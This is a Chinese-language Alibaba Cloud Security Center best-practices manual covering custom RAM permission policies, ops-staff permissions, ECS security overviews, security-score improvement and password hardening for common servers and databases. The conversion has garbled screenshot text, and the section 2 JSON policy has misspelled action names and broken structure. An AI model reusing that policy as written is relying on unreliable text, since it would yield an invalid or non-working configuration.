



云安全中心(态势感知) 最佳实践

文档版本: 20220621



法律声明

阿里云提醒您在阅读或使用本文档之前仔细阅读、充分理解本法律声明各条款的内容。 如果您阅读或使用本文档,您的阅读或使用行为将被视为对本声明全部内容的认可。

- 您应当通过阿里云网站或阿里云提供的其他授权通道下载、获取本文档,且仅能用 于自身的合法合规的业务活动。本文档的内容视为阿里云的保密信息,您应当严格 遵守保密义务;未经阿里云事先书面同意,您不得向任何第三方披露本手册内容或 提供给任何第三方使用。
- 未经阿里云事先书面许可,任何单位、公司或个人不得擅自摘抄、翻译、复制本文 档内容的部分或全部,不得以任何方式或途径进行传播和宣传。
- 由于产品版本升级、调整或其他原因,本文档内容有可能变更。阿里云保留在没有 任何通知或者提示下对本文档的内容进行修改的权利,并在阿里云授权通道中不时 发布更新后的用户文档。您应当实时关注用户文档的版本变更并通过阿里云授权渠 道下载、获取最新版的用户文档。
- 4. 本文档仅作为用户使用阿里云产品及服务的参考性指引,阿里云以产品及服务的"现状"、"有缺陷"和"当前功能"的状态提供本文档。阿里云在现有技术的基础上尽最大努力提供相应的介绍及操作指引,但阿里云在此明确声明对本文档内容的准确性、完整性、适用性、可靠性等不作任何明示或暗示的保证。任何单位、公司或个人因为下载、使用或信赖本文档而发生任何差错或经济损失的,阿里云不承担任何法律责任。在任何情况下,阿里云均不对任何间接性、后果性、惩戒性、偶然性、特殊性或刑罚性的损害,包括用户使用或信赖本文档而遭受的利润损失,承担责任(即使阿里云已被告知该等损失的可能性)。
- 5. 阿里云网站上所有内容,包括但不限于著作、产品、图片、档案、资讯、资料、网站架构、网站画面的安排、网页设计,均由阿里云和/或其关联公司依法拥有其知识产权,包括但不限于商标权、专利权、著作权、商业秘密等。非经阿里云和/或其关联公司书面同意,任何人不得擅自使用、修改、复制、公开传播、改变、散布、发行或公开发表阿里云网站、产品程序或内容。此外,未经阿里云事先书面同意,任何人不得为了任何营销、广告、促销或其他目的使用、公布或复制阿里云的名称(包括但不限于单独为或以组合形式包含"阿里云"、"Aliyun"、"万网"等阿里云和/或其关联公司品牌,上述品牌的附属标志及图案或任何类似公司名称、商号、商标、产品或服务名称、域名、图案标示、标志、标识或通过特定描述使第三方能够识别阿里云和/或其关联公司)。
- 6. 如若发现本文档存在任何错误,请与阿里云取得直接联系。

通用约定

格式	说明	样例
⚠ 危险	该类警示信息将导致系统重大变更甚至故 障,或者导致人身伤害等结果。	⚠ 危险 重置操作将丢失用户配置数据。
⚠ 警告	该类警示信息可能会导致系统重大变更甚 至故障,或者导致人身伤害等结果。	警告 重启操作将导致业务中断,恢复业务 时间约十分钟。
〔) 注意	用于警示信息、补充说明等,是用户必须 了解的内容。	大) 注意 权重设置为0,该服务器不会再接受新 请求。
? 说明	用于补充说明、最佳实践、窍门等,不是 用户必须了解的内容。	⑦ 说明 您也可以通过按Ctrl+A选中全部文件。
>	多级菜单递进。	单击设置> 网络> 设置网络类型。
粗体	表示按键、菜单、页面名称等UI元素。	在 结果确认 页面,单击 确定 。
Courier字体	命令或代码。	执行 cd /d C:/window 命令,进入 Windows系统文件夹。
斜体	表示参数、变量。	bae log listinstanceid
[] 或者 [alb]	表示可选项,至多选择一个。	ipconfig [-all -t]
{} 或者 {a b}	表示必选项,至多选择一个。	switch {act ive st and}

目录

1.RAM用户自定义权限最佳实践	05
2.云安全中心自定义运维权限最佳实践	10
3.快速掌握ECS安全态势	14
4.提高安全评分最佳实践	16
5.提升登录口令安全最佳实践	19
6.MongoDB漏洞检测最佳实践	23
7.AK和账密防泄漏最佳实践	25
8.Linux软件漏洞修复最佳实践	28
9.Linux系统木马查杀	32
10.云安全中心反弹Shell多维检测技术详解	34
11.挖矿程序处理最佳实践	45
12.防御挂马攻击最佳实践	50
13.阿里云服务器批量安装Agent	52
14.非阿里云服务器安装Agent	56
15.线下IDC使用云安全中心最佳实践	60
16.防勒索最佳实践	64

1.RAM用户自定义权限最佳实践

本文介绍如何自定义云安全中心的访问控制权限,并授予RAM用户使用云安全中心不同功能的权限,实现精 细化的权限管理。

背景信息

阿里云访问控制服务为各云产品提供默认的访问控制系统策略,同时支持用户自定义访问控制策略。系统策略由阿里云默认创建,不支持修改。

⑦ 说明 云安全中心支持的默认策略为 AliyunYundunSASFullAccess (表示允许RAM用户对云安全中心的所有功能进行操作)和 AliyunYundunSASReadOnlyAccess (表示允许RAM用户只读访问云安全中心的所有数据)。

如果您需要对RAM用户访问和操作云产品进行更精确地限制,您可以使用自定义权限(即RAM Policy)。

本文以自定义资产中心的权限为例,介绍自定义权限策略配置的流程。建议您提前了解权限策略的相关信息,更多信息,请参见<mark>权限策略语法和结构</mark>。有关访问控制的基本概念介绍,请参见基本概念。

前提条件

已创建RAM用户。更多信息,请参见创建RAM用户。

步骤一: 创建云安全中心自定义权限策略

- 1. 使用阿里云账号登录RAM控制台。
- 2. 在左侧导航栏,选择权限管理 > 权限策略。
- 3. 在权限策略页面, 单击创建权限策略。
- 4. 在创建权限策略页面,单击脚本编辑页签。
- 5. 在脚本编辑页签下,根据要自定义的权限策略类型配置策略内容。

配置脚本如下:

○ 授权RAM用户资产中心只读权限

以下策略表示授予RAM用户只读资产中心的资产列表、服务器各项统计数据、资产列表的权限,您可 以通过设置 yundun-sas:DescribeCloudCenterInstances 、 yundun-sas:DescribeFieldStatisti cs 和 yundun-sas:DescribeCriteria 来进行授权。

```
{
    "Version": "1",
    "Statement": [
        {
            "Action": [
               "yundun-sas:DescribeCloudCenterInstances",
               "yundun-sas:DescribeFieldStatistics",
               "yundun-sas:DescribeCriteria"
               ],
               "Resource": "*",
               "Effect": "Allow"
        }
    ]
}
```

○ 授予RAM用户资产中心安全检查的权限

以下策略表示授权RAM用户(在步骤二中绑定对应的RAM账户完成授权)执行资产中心安全检查的权限。您可以通过设置 yundun-sas:ModifyPushAllTask 来进行该授权。

```
{
    "Version": "1",
    "Statement": [
        {
            "Action": "yundun-sas:ModifyPushAllTask",
            "Resource": "*",
            "Effect": "Allow"
        }
    ]
}
```

○ 授权RAM用户漏洞修复只读权限

以下策略表示授予RAM用户(在步骤二中绑定对应的RAM账户完成授权)只读漏洞修复的漏洞列表、 漏洞白名单的权限,您可以通过设置 yundun-aegis:DescribeVulList 和 yundun-sas:DescribeVu lWhitelist 来进行授权。

```
{
    "Version": "1",
    "Statement": [
        {
            "Action": [
               "yundun-aegis:DescribeVulList",
               "yundun-sas:DescribeVulWhitelist"
               ],
               "Resource": "*",
               "Effect": "Allow"
        }
   ]
}
```

○ 授予RAM用户修复漏洞的权限

以下策略表示授权RAM用户(在步骤二中绑定对应的RAM账户完成授权)允许执行漏洞修复的权限。 您可以通过设置 yundun-aegis:OperateVul 来进行该授权。

```
{
    "Version": "1",
    "Statement": [
        {
            "Action": "yundun-aegis:OperateVul",
            "Resource": "*",
            "Effect": "Allow"
        }
    ]
}
```

6. 单击下一步:编辑基本信息,然后输入权限策略的名称和备注。

7. 单击确定。

步骤二:为RAM用户授权

1. 使用阿里云账号登录RAM控制台。

- 2. 在左侧导航栏选择权限管理 > 授权。
- 3. 在授权页面,单击新增授权。
- 在授权主体区域,选择需要授权的RAM用户。
 新创建的RAM用户默认不支持任何权限。
- 5. 在**选择权限**区域,选择**自定义策略**,并选择在<mark>步骤一</mark>中创建的云安全中心自定义策略,单击**确定**,然 后单击**完成**。

支持自定义权限策略的操作

以下各表格介绍了云安全中心主要的功能模块支持的自定义权限策略:

资	产	中	心
---	---	---	---

RAM权限策略Action	描述	支持的API
yundun- sas:DescribeCloudCenterInstance s	查询资产列表信息。包括资产的类 型、是否存在安全告警、客户端在线 状态等。	DescribeCloudCenterInstances
yundun- sas:DescribeFieldStatistics	查询您资产中服务器的统计信息。	DescribeFieldStatistics
yundun-sas:DescribeCriteria	获取查询资产时,输入的模糊匹配值 对应的查询条件信息。	DescribeCriteria
yundun-sas: Modif yPushAllT ask	对服务器执行安全检查任务。	ModifyPushAllTask
yundun- sas:DescribeDomainCount	获取域名资产的数量。	DescribeDomainCount
yundun-sas:DeleteGroup	删除资产的分组。	DeleteGroup
yundun- sas:DescribeSearchCondition	查询资产的筛选条件。	DescribeSearchCondition
yundun- sas:DescribelmageStatistics	查询容器镜像资产的风险统计信息。	DescribelmageStatistics
yundun- sas:DescribeGroupedTags	查询资产标签的统计信息。	DescribeGroupedTags
yundun- sas:DescribeDomainCount	获取域名资产数量。	DescribeDomainCount
yundun- sas:DescribeCloudProductFieldSt atistics	获取云产品统计信息。	DescribeCloudProductFieldStatisti cs
yundun- sas:DescribeCloudCenterInstance s	查询资产信息。	DescribeCloudCenterInstances
yundun-sas:DescribeAllGroups	查询所有服务器分组信息。	DescribeAllGroups

RAM权限策略Action	描述	支持的API
yundun-sas:DeleteGroup	删除服务器分组。	DeleteGroup
yundun- sas:CreateOrUpdateAssetGroup	创建服务器分组或修改服务器分组下 的服务器。	CreateOrUpdateAssetGroup
yundun- sas:DescribeInstanceStatistics	查询资产的风险统计信息。	DescribeInstanceStatistics
yundun-sas:PauseClient	启用或暂停Agent客户端。	PauseClient
yundun-sas:ModifyTagWithUuid	修改资产的标签名称或修改指定标签 下包含的资产。	Modif yT agWit hUuid
yundun-sas:RefreshAssets	同步最新资产。	RefreshAssets
yundun-sas:ExportRecord	导出资产中心、云平台配置检查、镜 像安全扫描、攻击分析、AK泄露检 测等页面的检测结果的Excel文件。	ExportRecord
yundun-sas:DescribeExportInfo	查看资产导出任务的进度。	DescribeExportInfo
yundun-sas:DescribeDomainList	查询域名资产信息列表。	DescribeDomainList
yundun- sas: DescribeDomainDet ail	获取域名资产详情。	DescribeDomainDetail
yundun- aegis:DescribeAssetDetailByUuid	使用资产的UUID查询资产的详情。	DescribeAssetDetailByUuid

漏洞修复

RAM权限策略Action	描述	支持的API
yundun-sas:DescribeVulWhitelist	分页查询漏洞白名单。	DescribeVulWhitelist
yundun-sas:ModifyOperateVul	对检测到的漏洞进行处理,处理方式 包括修复、验证、忽略等。	ModifyOperateVul
yundun- sas:ModifyVulTargetConfig	设置单台服务器的漏洞检测配置。	ModifyVulT arget Config
yundun- aegis:DescribeConcernNecessity	查询关注的漏洞修复必要性信息。	DescribeConcernNecessity
yundun-aegis:DescribeVulList	根据漏洞类型查询对应漏洞信息。	DescribeVulList
yundun-aegis:ModifyOperateVul	对检测到的漏洞进行处理,处理方式 包括修复、验证、忽略等。	ModifyOperateVul
yundun- aegis:DescribeImageVulList	查看镜像安全扫描的漏洞的详情及受 漏洞影响容器镜像的信息列表。	DescribelmageVulList

RAM权限策略Action	描述	支持的API
yundun-aegis:ExportVul	导出漏洞列表。	ExportVul - 导出漏洞列表
yundun- aegis:DescribeVulExportInfo	查看漏洞导出任务的进度。	DescribeVulExportInfo - 查看漏洞 导出任务的进度

⑦ 说明 多数情况下RAM自定义权限策略中的Action与该云产品的API——对应,但也有例外。

相关文档

权限策略基本元素

权限策略语法和结构

通过RAM限制用户的访问IP地址

通过RAM限制用户的访问时间段

2.云安全中心自定义运维权限最佳实 践

如果需要为运维人员自定义云安全中心的访问控制权限,例如只允许运维人员使用漏洞扫描、漏洞修复和基 线检查功能,您可以在RAM控制台创建自定义策略并为运维人员的RAM用户授权,实现精细化权限管理。本 文介绍如何为运维人员自定义云安全中心的访问控制权限。

背景信息

阿里云访问控制服务为各云产品提供默认的访问控制系统策略,同时支持用户自定义访问控制策略。您可以 使用自定义权限对RAM用户访问和操作云安全中心进行精确的限制。本文仅介绍如何对运维人员进行权限策 略设置,实现只允许运维人员使用漏洞扫描、漏洞修复、基线检查和资产中心的功能。如果有其他的精细化 权限管理需求,您可以自定义权限策略。具体操作,请参见RAM用户自定义权限最佳实践。

前提条件

已为运维人员创建RAM用户。具体操作,请参见创建RAM用户。

步骤一:为运维人员创建云安全中心自定义权限策略

- 1. 使用阿里云账号登录RAM控制台。
- 2. 在左侧导航栏,选择权限管理 > 权限策略。
- 3. 在权限策略页面, 单击创建权限策略。
- 4. 在创建权限策略页面,单击脚本编辑页签。

在策略内容中输入以下内容。

```
{
   "Version": "1",
    "Statement": [{
            "Action": [
                "yundun-aegis:OperateVul",
                "yundun-aegis:ModifyStartVulScan"
            ],
            "Resource": "*",
            "Effect": "Allow"
        },
        {
            "Action": [
                "yundun-aeqis:FixCheckWarnings",
                "yundun-aegis:IgnoreHcCheckWarnings",
                "vundun-aegis:ValidateHcWarnings"
            ],
            "Resource": "*",
            "Effect": "Allow"
        },
        {
            "Action": "ecs:RebootInstance",
            "Effect": "Allow",
            "Resource": "*",
            "Condition": {
                "Bool": {
                    "acs:MFAPresent": "true"
```

} }, { "Action": "ecs:*", "Effect": "Allow", "Resource": ["acs:ecs:*:*:*" 1 }, { "Action": "ecs:CreateSnapshot", "Effect": "Allow", "Resource": ["acs:ecs:*:*:*", "acs:ecs:*:*:snapshot/*"] }, { "Action": ["ecs:Describe*"], "Effect": "Allow", "Resource": "*" }, { "Action": ["yundun-sas:ModifyPushAllTask", "yundun-sas:DeleteTagWithUuid", "yundun-sas:ModifyTagWithUuid", "yundun-sas:CreateOrUpdateAssetGroup", "yundun-sas:DeleteGroup", "yundun-sas:ModifyAssetImportant", "yundun-sas:RefreshAssets"], "Resource": "*", "Effect": "Allow" }] }

⑦ 说明 以上策略允许RAM用户使用漏洞扫描、漏洞修复、基线检查和资产中心功能并进行相关 操作。添加该策略后, RAM用户具体可以执行的操作,请参见权限策略Action说明表格中的Action 及其说明。

5. 单击下一步:编辑基本信息,然后输入权限策略的名称和备注。

6. 单击**确定**。

步骤二:为运维人员使用的RAM用户授权

- 1. 使用阿里云账号登录RAM控制台。
- 2. 在左侧导航栏,单击权限管理 > 授权。
- 3. 在授权页面, 单击新增授权。

- 在授权主体区域,选择需要授权的运维人员的RAM用户。
 新创建的RAM用户默认不支持任何权限。
- 5. 在**选择权限**区域,选择需要授予运维人员RAM用户的权限。

您需要按照以下步骤选择权限。

- i. 在系统策略页签下,搜索并选择AliyunYundunSASReadOnlyAccess策略。
 该系统策略可以授予运维人员只读访问云安全中心服务的权限。
- ii. 单击自定义策略页签,选择步骤一中创建的自定义策略。该自定义策略可以授予运维人员管理云安全中心资产中心、漏洞扫描、漏洞修复和基线检查功能的权限,例如为服务器执行安全检查、执行一键漏洞扫描、修复漏洞等权限。

6. 单击**确定**。

权限策略Action说明

功能模块	Action	说明
	yundun-aegis: OperateVul	处理漏洞,包括执行验证漏洞、忽略漏洞、修复 漏洞等操作。
漏洞修复	yundun- aegis:ModifyStartVulScan	一键扫描漏洞。
	ecs:RebootInstance	漏洞修复后重启实例。
	ecs:CreateSnapshot	修复漏洞前创建快照。
基线检查	yundun- aegis:FixCheckWarnings	修复基线检查风险项。
	yundun- aegis:IgnoreHcCheckWarnin gs	忽略或取消忽略基线检查风险项。
	yundun- aegis:ValidateHcWarnings	验证基线检查风险项。
	yundun- sas:ModifyPushAllTask	为服务器执行安全检查任务。
	yundun- sas:DeleteTagWithUuid	删除自定义标签。
	yundun- sas:ModifyTagWithUuid	修改标签与服务器或云产品的关系。
资产中心	yundun- sas:CreateOrUpdateAssetGr oup	修改服务器与服务器分组的关系。
	yundun-sas:DeleteGroup	删除服务器分组。

功能模块	Action	说明
	yundun- sas:ModifyAssetImportant	修改资产重要性标签。
	yundun-sas:RefreshAssets	同步最新资产。

相关文档

RAM用户自定义权限最佳实践 通过RAM管控多运维人员的权限 权限策略基本元素 权限策略语法和结构

3.快速掌握ECS安全态势

云安全中心是一款实时识别、分析、预警安全威胁的统一安全管理系统。通过防勒索、防病毒、防篡改、合规检查等安全能力,帮助您实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上资产和本地主机并 满足监管合规要求。ECS服务器默认受到云安全中心基础版的防护。

云安全中心防病毒版及以上版本支持病毒自动隔离,可对目前部分主流勒索病毒(如WannaCry和 Globelmposter)、DDoS木马(如XorDDos和BillGates)进行主动防护和主动隔离。建议您启用该功能,提 升您资产的安全防线。如何启用**自动隔离**功能,请参见云安全中心主动防御。

云安全中心各版本的功能详情,请参见功能特性。

前提条件

您在购买ECS实例时,需勾选**安全加固**选项,云安全中心才会对您的ECS服务器提供安全防护。

					云服务器加载基础安全组件,提供网站漏洞检查、云产品安 全配置检查、主机登录异常告警等安全功能,并可以通过云	A
镜像	公共镜像	自定义镜像	共享镜像	镜像市	安全中心统一管理。	-
	Aliyun Linux ▼ Aliyun Linux 镜像由阿里云官)	请选择版本 一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一	针对 ECS 做了大量深度优化,:	完全兼容 CentOS	✓ 安全加固 2 安全加固 2 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5	>

查看ECS实例概览信息

您可以登录ECS管理控制台,在概览页面单击**立即处理**,跳转到云安全中心总览页面,查看ECS的安全详 情。

资源搜	素 资源报表 功能概流					
	 気急 1 の生め目空の周囲 	10	您有 11 条安全风险		营业检查	
 影明头的 ■ 5 查看全部 → 	 □ (1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(安全评分	93	448 396 52	9 9	>

您可在云安全中心**总览**页面查看资产的威胁概览信息和安全评分信息,例如待处理的告警事件数量及其紧急 程度、检测到的告警事件总数等信息。详细信息,请参见总览。

总览 容器网络拓扑	云资产全景 关于我们			(R)	8先费接入指南 快速了解云安全中心 产品更新记录
高危漏洞連报 泛微e-cology(OA WorkflowServiceXml 统过访问限制漏洞 2	021年5月13日16:10:35 披露(已披露 19小时)	去检测		
安全评分) 旗舰版	2022年4月16日到期
			已累计停护场 28 立即升级	\$9歲产 天 惊责	
安全防御 (累计为55469位用户)	进行病毒扫描508,184次) 立即扫描			接权线数/总线数 未助护资产(ECS) 2500 / 532 62 立即安装	网站 -
恣 防御病毒数	※ 网页防算改	※ AccessKey泄露检测	🔅 历史已修复漏洞	容器	
14	-	1 ② 实时检测中	1043	66	
近15天 +7	近15天 +0	近15天 +0	-		
 已开启安全能力 ③ 本 ◎ ④ ④ ④ ○ 病毒库更新版本 2021年5月14日 系統漏測扫描时間・2021年5月14 	0 ⋡ 11.5947 4⊟11.07:34	防御茶 🔮 29 GB/30GB	日志分析 0 / 0	5月限時均衡电版本专案活动 一級开启共高能力,或改造关论时,勤致,恶意大品等会计 低至 ¥ 5元/核/月 8 立刻购买	机大主流病毒,解决病毒入侵或的

单击**待处理告警、待修复漏洞、基线问题或攻击次数**模块的**立即处理**,可进入对应的功能模块查看资产 威胁的具体详情并进行处理。

448 396 52 0	93 🐽 💿	9 💿 💿	10061
待处理告答	即处理 待修复漏洞	基金问题	攻击次数
安全风险			

查看单个ECS实例安全详情

您可以在ECS管理控制台的实例页面,单击实例列表中的阿里云云盾图标跳转到云安全中心控制台资产中 心页面,查看单个ECS实例的安全详情。

Instances											G	Create	e Instance	Diagnose	Bu	Ik Action
The security group contain a rule t	hat allows any IP address	es to access some ports. This may cau	ise potential risks. <mark>View</mark> l	Details												
You currently have 2 ECS, and the	overall load is within 7 day	ys More than 80%. To ensure the smo	oth operation of your b	usiness, it is recom	mended to view r	relevant data and upgrade	or expand View r	now								
 Select an instance attribute or 	enter a keyword	0	Q Tags											Advanced S	earch	* *
Instance ID/Name	Tag Monitori	ng Zone 👻 IP Address	Networ Status 👻 Type 👻	Specifications	Instance Family	VPC Details	Billing Method v	SSH Renewal Key Pair	Connection Status	RAM Cluster Role ID	Stop Mode ⑦	Unlimited I Mode I	Dedicated Host	Deployment Set	Actions	
i-m x3j	 ♥ ♥ ● 	Qingdao 12 9(Public) Zone C 17 13(Private	Expired VPC	2 vCPU 8 Gi8 (I/O Optimized) ecs.sn2ne.large 1Mbps	ecs.sn2ne.large General Purpose Network Performance Enhanced	vpc- mSeasrkpu vsw- mSe2tgd2t	Subscription To Be Released After 3 Days		-		-		-		Manage Renew Da	Upgrade/E ita Storage

在云安全中心的资产中心页面查看单个ECS实例的安全详情。更多信息,请参见查看单个资产详情。

← k ,	← k → 120 116 徑 172 211 私											
基本信息	漏洞信息 55	安全告警处理	基线检查 2	资产指纹调查 433	云平台配置 3							
风险状态	详细信息 资	产指纹调查 漏洞格	到 防暴力破制	¥ 登录安全设置								
风险状态												
¢	_{漏洞} 55				22			<i>墓</i> 錫检查 2				
详细信息												
ID 分组	i-m5e7uuvd 未分组 更换分	觛					地域 标签	华北1 (青岛) Internetip × ◆				
公网IP IP列表	120 16 172 21	1					私网IP MAC地址	17: 11 00:1 ja:1c				
操作系统 内存	🛕 Linux 8GB						状态 CPU	在施 Intel(R) Xeon(R) Platinum 8269CY CPU @ 2.50GHz / 2核				
内核版本	3.10.0-514.26.	2.el7.x86_64					磁盘	/dev/vda1 巳使用3GB / 共40GB ━				

⑦ 说明 如果资产列表页面中,单个资产的客户端状态为离线,说明云安全中心Agent已离 线,Agent离线的服务器将不受云安全中心的保护。您需在云安全中心控制台设置 > 安装/卸载插件页 面定位到该服务器并进行安装客户端操作。具体操作,请参见安装或卸载插件。

4.提高安全评分最佳实践

云安全中心总览页面根据您资产整体的安全状态展示当前的安全评分。安全评分越高说明您系统的安全隐患 越少。如果您资产的安全评分低于95分,建议您尽快处理检测出的安全风险问题。本文介绍如何提高资产的 安全评分。

背景信息

- 安全评分分值说明,请参见安全分值表。
- 安全评分扣分标准,请参见安全评分扣分项目表。

处理安全风险

- 1. 登录云安全中心控制台。
- 2. 在总览页面安全评分模块,单击立即处理。

意览	容職网络拓扑	云资产全景	关于我们	
安全评约	9			
			发现	10 冬风龄
	20 14		您的多	资产已经暴露在黑客入侵和病毒感染的威胁下,请您尽快处理。
	0 被推		立	印 处理
	相撲實現版成的检	测能力评估		

3. 在安全风险处理面板定位到需要处理风险的模块,单击右侧立即处理。

安全风险处理	×
发现 15 祭安全风险,建议您尽快处理。	不知道如何处理?试试 安全专家服务
✓ 关键功能配置 2 安全分 -4	
防病毒功能 支持主流勘索病毒、DDOS木马、挖矿和木马程序、恶意程序、后门程序和蠕虫病毒等类型,释忽更好守护服务器 全	安立聊处理
防暴力破解 该功能支持用户自定义防爆力破解策略,拦截对服务器恶意登陆的登陆ip,保护用户账号安全。	立即处理
✓ 待处理告答 3 安全分 -40	帮助文档 ⑦
存在未处理的高危吉警事件 您有7.504条安全告答,影响 资产	立即处理
存在未处理的中危告誓事件 您有2,835会女告告等,影响 资产	立即处理
存在未处理的低危告誓事件 您有5条安全告答,影响	立即处理
>>> 待修复漏洞 4 安全分 -12	帮助文档 ⑦
存在未修复的CMS漏洞 您有6余漏洞	立即处理
存在未修复的Windows主机漏洞 您有112多漏洞,影响 服务器	立即处理
存在未修复的Linux主机漏阀 您有705经漏洞,影响; 服务器	立即处理
存在未修复的应急漏洞 存在1个未修复的应急漏洞	立即处理
> 基线问题 1 安全分 -2	帮助文档 ⑦
> 云平台配置风险 3 安全分 -34	帮助文档 ⑦
> AK泄動问题 1 安全分 -30	8
> 其他 1 安全分 -5	帮助文档 ⑦

4. 在跳转后的相应模块处理安全风险事件。

您可以参考以下操作指导处理资产中存在的安全风险。

- 配置防暴力破解规则:在威胁检测 > 安全告警处理页面页面,单击右上角安全告警设置,在防暴力破解页签配置防暴力破解规则。具体操作,请参见配置防暴力破解规则。
- 开启防勒索策略:在主动防御 > 病毒防御页面开通病毒防御功能并配置防勒索相关策略。具体操作,请参见开通服务、创建防护策略。
- 处理安全告警:在威胁检测 > 安全告警处理页面处理相应告警。具体操作,请参见查看和处理告警事件。
- 修复漏洞:在安全防范 > 漏洞修复页面处理资产中存在的漏洞。
 - 修复Linux软件漏洞的具体操作,请参见Linux软件漏洞。
 - 修复Windows系统漏洞的具体操作,请参见Windows系统漏洞。
 - 修复Web-CMS漏洞的具体操作,请参见Web-CMS漏洞。
 - 处理应用漏洞的具体操作,请参见应用漏洞。
 - 处理应急漏洞的具体操作,请参见应急漏洞。
- 基线问题:在安全防范 > 基线检查页面处理基线检查风险。具体操作,请参见查看和处理基线检查 结果。
- 云平台配置风险:在安全防范 > 云平台配置检查页面处理云平台配置检查风险。具体操作,请参见查看和处理云平台配置检查结果。
- AK泄露问题:在威胁检测 > AK泄露检测页面处理AK泄露事件。具体操作,请参见AK泄露检测。
 所有安全风险处理完成后安全评分可达到95分。



? 说明

- 安全风险处理页面其他 > 存在攻击事件的扣分仅表示您的资产受到过攻击,该模块无需进行处理。您可在威胁检测 > 攻击分析页面查看云安全中心已成功拦截的攻击记录。攻击分析更多信息,请参见攻击分析。
- 云安全中心防病毒版不支持基线检查、攻击分析功能,因此这两项没有纳入防病毒版的安全评分中。
- 云安全中心高级版不支持攻击分析功能,因此该项没有纳入高级版的安全评分中。

相关文档

- 安全分值表
- 安全评分扣分项目表

• 安全评分FAQ

5.提升登录口令安全最佳实践

如果您的服务器使用弱口令登录,黑客可能会非法登录您的服务器,窃取服务器数据或破坏服务器。建议您为服务器设置复杂的登录口令,并定期提升登录口令的安全性。本文介绍如何提升登录口令的安全性以及常见服务器登录口令的修改方法。

背景信息

在服务器系统中使用弱口令可能会造成以下危害:

- 个人用户使用的弱口令可能会被猜解或被破解工具破解,从而泄露个人隐私信息,甚至造成财产损失。
- 系统管理员使用弱口令可能会导致整个系统被攻击、数据库信息被窃取、业务系统瘫痪,造成所有用户信息的泄露和巨大的经济损失,甚至可能引发群体性的网络安全危害事件。

及时检测弱口令能够有效防止系统被攻击和信息泄露,可以提高系统的安全性。您可以根据以下建议加强您 服务器的安全防护。

- 参考本文介绍的提升口令安全的方法设置登录口令。具体方法,请参见提升口令安全。
- 使用云安全中心基线检查功能,检查您的服务器中是否存在高危弱口令风险。如果在您的资产中检测出了 高危弱口令风险,建议您及时修改资产中的弱口令。具体方法,请参见修改常见的服务器弱口令。

提升口令安全

您可以通过以下方法提升登录口令的安全性:

- 设置复杂密码
 复杂密码应同时满足以下要求:
 - 密码长度大于等于8个字符。
 - 至少包含以下三种字符的组合:
 - 大写字母 (A~Z)
 - 小写字母 (a~z)
 - 数字(0~9)
 - 特殊字符 (~、!、@、\$、%、^、&、*、-、_、=、+、#、/、?)
 - 密码不能为用户名或用户名的倒序。

• 不使用常见或公开的弱口令

以下是常见或公开的弱口令:

- 已公开的常用弱口令。例如abcd1234、admin、root、admin@123等。
- 数字或字母连排或混排,键盘字母连排。例如123456、abcdef、123abc、qwerty、1qaz2wsx等。
- 短语密码。例如5201314、woaini1314等。
- 公司名称、生日、姓名、身份证、手机号、邮箱名、用户ⅠD、时间年份等。
- 定期修改密码

建议每隔90天更改一次密码。

修改常见的服务器弱口令

以下表格介绍修改Linux服务器、MySQL数据库、Redis数据库等常见系统的登录弱口令的操作防范。

系统名称	修改登录口令操作步骤	说明
------	------------	----

最佳实践·提升登录口令安全最佳实践

云安全中心(态势感知)

系统名称	修改登录口令操作步骤	说明
Linux系统	在Linux系统服务器中,执行 passwd [<user>]命令修改用户登录口令。</user>	其中 <user> 为登录用户名,如 果不输入则修改的是当前用户的口 令。执行完命令后请根据提示输入新 口令。</user>
Windows系统	本处以Windows 10为例说明修改用户登录口令的 方法。 1. 登录Windows服务器后,在左下角单击 ■标。 2. 单击 ② 图标。 3. 在Windows设置页面,单击帐户。 4. 在左侧导航栏单击登录选项。 5. 根据页面提示更改服务器密码。	无
MySQL数据库	 1. 登录MySQL数据库。 2. 执行以下命令查看数据库用户密码信息。 SELECT user, host, authentication_string FROM user; ⑦ 说明 部分MySQL数据库版本可能 不支持上述查询命令。如果您执行上述 命令未获得用户密码信息,请您执行以 下命令。 SELECT user, host, password FROM user; 3. 执行以下命令根据查询结果及弱密码告警信 息修改具体用户的密码。 SET PASSWORD FOR '用户名'@'主机' = PASSWORD FOR '用户名'@'主机' = PASSWORD ('新密码'); 4. 执行刷新命令 flush privileges; 。 	无
Redis数据库	 打开Redis数据库的配置文件<i>redis.conf</i>。 执行以下命令修改或增加口令。 requirepass <password>;</password> 重启Redis服务。 	其中 <password> 为登录口令。 如果已存在登录口令,则将其修改为 复杂口令;如果不存在登录口令,则 添加新口令。</password>

云安全中心(态势感知)

最佳实践·提升登录口令安全最佳实践

系统名称	修改登录口令操作步骤	说明
SQL Server数据库	 Linux系统登录 登录SQL Server数据库,执行以下命令修改登录口令。 exec sp_password '<oldpassword>','<newpassword>','</newpassword></oldpassword> user>' Windows认证登录 在SQL Server数据库客户端依次选择安全性 > 登录名,选中用户后将弱口令修改为复杂口 令。 	其中 <oldpassword> 为旧口 令, <newpassword> 为新口 令, <user> 为用户名。</user></newpassword></oldpassword>
MongoDB数据库	 登录MongoDB数据库。 执行 use admin 命令切换到admin用 户。 执行 use <db_name> 命令切换到需要修 改登录口令的数据库。</db_name> 执行 db.updateUser('<username>',{p wd:'<newpassword>'}) 命令修改数据库 的登录名和口令。</newpassword></username> 	 db_name 为需要修改登录口令的数据库名称。 username 为待修改口令的用户名, newpassword 为新口令。 修改口令完成后,需等待15分钟才能检测修改后的口令是否为弱口令。
PostgreSQL数据库	 登录PostgreSQL数据库。 执行以下命令修改弱口令。 ALTER USER <user> WITH PASSWORD '<newpassword>'; </newpassword></user> 	其中 <user> 为用户 名, <newpassword> 为新口 令。</newpassword></user>
Tomcat	 打开Tomcat根目录下的配置文件<i>conf/tom</i> <i>cat-user.xml</i>。 修改user节点的password属性值为复杂口 令。 	无
Rsync	 打开Rsync的配置文件<i>rsyncd.conf</i>。 找到 secrets file 配置项,并在该配置 项中找到 rsyncd.secret 文件的路径。 将<i>rsyncd.secret</i>文件按 用户名:口令 的形 式编辑,修改对应用户的口令为新的复杂口 令。 重启Rsync服务。 	无

系统名称	修改登录口令操作步骤	说明
SVN	 打开版本库目录。 在配置文件<i><path>/conf/svnserve.conf</path></i>中 找到 password-db 。 根据password-db配置找到口令配置文件路 径,将该文件中的口令修改为指定的口令 (默认为passwd文件)。 重启SVN服务。 	无
